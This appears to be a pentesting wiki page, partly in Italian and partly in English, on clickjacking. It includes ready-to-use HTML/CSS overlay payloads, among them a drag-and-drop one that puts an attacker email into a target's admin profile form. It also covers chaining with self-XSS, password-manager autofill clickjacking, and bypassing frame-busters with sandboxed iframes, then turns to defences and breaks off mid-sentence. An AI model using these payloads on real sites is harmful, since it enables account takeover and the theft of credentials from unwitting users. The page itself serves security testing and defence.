Clickjacking

Reading time: 9 minutes

Che cos'è Clickjacking

In un attacco clickjacking, un utente viene indotto a cliccare su un elemento in una pagina web che è invisibile o mascherato come un elemento diverso. Questa manipolazione può portare a conseguenze non volute per l'utente, come il download di malware, il reindirizzamento a pagine web malevole, la fornitura di credentials o informazioni sensibili, trasferimenti di denaro o l'acquisto online di prodotti.

Trucco per precompilare i form

A volte è possibile riempire il valore dei campi di un form utilizzando parametri GET durante il caricamento di una pagina. Un attacker può abusare di questo comportamento per compilare il form con dati arbitrari e inviare il payload di clickjacking in modo che l'utente prema il pulsante Submit.

Popolare il form con Drag&Drop

Se hai bisogno che l'utente compili un form ma non vuoi chiedergli direttamente di inserire informazioni specifiche (come l'email e/o una password specifica che conosci), puoi semplicemente chiedergli di Drag&Drop qualcosa che scriverà i dati controllati da te come in questo esempio.

Payload di base

<style>
iframe {
position:relative;
width: 500px;
height: 700px;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:470px;
left:60px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://vulnerable.com/email?email=asd@asd.asd"></iframe>

Payload multifase

<style>
iframe {
position:relative;
width: 500px;
height: 500px;
opacity: 0.1;
z-index: 2;
}
.firstClick, .secondClick {
position:absolute;
top:330px;
left:60px;
z-index: 1;
}
.secondClick {
left:210px;
}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://vulnerable.net/account"></iframe>

Drag&Drop + Clic payload

<html>
<head>
<style>
#payload{
position: absolute;
top: 20px;
}
iframe{
width: 1000px;
height: 675px;
border: none;
}
.xss{
position: fixed;
background: #F00;
}
</style>
</head>
<body>
<div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.</div>
<div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete button</div>
<div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click me</div>
<iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts" style="opacity:0.3"src="https://target.com/panel/administration/profile/"></iframe>
<div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
</body>
</html>

XSS + Clickjacking

If you have identified an XSS attack that requires a user to click on some element to trigger the XSS and the page is vulnerable to clickjacking, you could abuse it to trick the user into clicking the button/link.
Example:
You found a self XSS in some private details of the account (details that only you can set and read). The page with the form to set these details is vulnerable to Clickjacking and you can prepopulate the form with the GET parameters.
An attacker could prepare a Clickjacking attack to that page prepopulating the form with the XSS payload and tricking the user into Submit the form. So, when the form is submitted and the values are modified, the user will execute the XSS.

DoubleClickjacking

Firstly explained in this post, this technique would ask the victim to double click on a button of a custom page placed in a specific location, and use the timing differences between mousedown and onclick events to load the victim page duing the double click so the victim actually clicks a legit button in the victim page.

An example could be seen in this video: https://www.youtube.com/watch?v=4rGvRRMrD18

A code example can be found in this page.

Estensioni del browser: DOM-based autofill clickjacking

Aside from iframing victim pages, attackers can target browser extension UI elements that are injected into the page. Password managers render autofill dropdowns near focused inputs; by focusing an attacker-controlled field and hiding/occluding the extension’s dropdown (opacity/overlay/top-layer tricks), a coerced user click can select a stored item and fill sensitive data into attacker-controlled inputs. This variant requires no iframe exposure and works entirely via DOM/CSS manipulation.

• For concrete techniques and PoCs see:

BrowExt - ClickJacking

Strategie per mitigare il Clickjacking

Difese lato client

Scripts executed on the client side can perform actions to prevent Clickjacking:

• Ensuring the application window is the main or top window.
• Making all frames visible.
• Preventing clicks on invisible frames.
• Detecting and alerting users to potential Clickjacking attempts.

However, these frame-busting scripts may be circumvented:

• Browsers' Security Settings: Some browsers might block these scripts based on their security settings or lack of JavaScript support.
• HTML5 iframe sandbox Attribute: An attacker can neutralize frame buster scripts by setting the sandbox attribute with allow-forms or allow-scripts values without allow-top-navigation. This prevents the iframe from verifying if it is the top window, e.g.

<iframe
id="victim_website"
src="https://victim-website.com"
sandbox="allow-forms allow-scripts"></iframe>

I valori allow-forms e allow-scripts abilitano azioni all'interno dell'iframe pur disabilitando la navigazione a livello top. Per garantire la funzionalità prevista del sito target, potrebbero essere necessarie autorizzazioni aggiuntive come allow-same-origin e allow-modals, a seconda del tipo di attacco. I messaggi nella console del browser possono indicare quali permessi consentire.

Server-Side Defenses

X-Frame-Options

The X-Frame-Options HTTP response header informa i browser sulla legittimità di renderizzare una pagina in un o